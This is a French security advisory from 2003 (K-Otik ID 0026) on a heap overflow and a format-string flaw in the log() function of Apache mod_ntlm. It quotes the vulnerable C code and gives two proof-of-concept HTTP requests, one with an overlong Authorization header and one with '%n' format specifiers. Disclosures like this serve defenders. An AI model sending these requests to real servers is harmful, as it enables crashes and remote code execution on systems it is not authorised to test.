Date de Publication: 2003-04-22
 Titre: Remote Vulnerabilties in Apache mod_ntlm
 K-Otik ID : 0026
 Exploitable à distance : Oui
 Exploitable en local : Non

 
  * Introduction *
 
mod_ntlm est un module Apache (disponible dans Apache 2.0), cela fournit la capacité pour les services d'Apache d'authentifier des utilisateurs par l'intermédiaire de la technologie d'authentification NTLM, qui est en grande partie spécifique à Microsoft IIS.

  * Description Technique - Exploit *

mod_ntlm contient deux vulnérabilités exploitables à distance, dans la fonction mod_ntlm "log()",

static void
log(const request_rec * r, const char *format,...)
{
    va_list ap;
    char *s;

    if ((s = (char *) malloc(2048)) == NULL)
        return;
    va_start(ap, format);
    vsprintf(s, format, ap);
    va_end(ap);
    ap_log_rerror(APLOG_MARK, APLOG_NOERRNO | APLOG_NOTICE, r, s);
    free(s);
}

La première faille est de type "heap overflow", qui résulte de la soumission d'une entrée supérieure à 2048 caractères. La seconde vulnérabilité se situe dans l'appel de ap_log_rerror(), ce qui permet l'exécution de code malicieux.

---------- Exemple d'exploitation ---------

GET / HTTP/1.0
Authorization: [Ax3000]

Ou

GET / HTTP/1.0
Authorization: %n%n%n%n

-----------------------------------------------

  * Versions Vulnérables *
 
Apache 1.3: mod_ntlm v0.4 and prior
Apache 2.0: mod_ntlmv2 v0.1


  * Solution *
 
Aucune pour l'instant.
 

  * Crédits *
 
Faille découverte par Matthew Murphy (Avril 2003).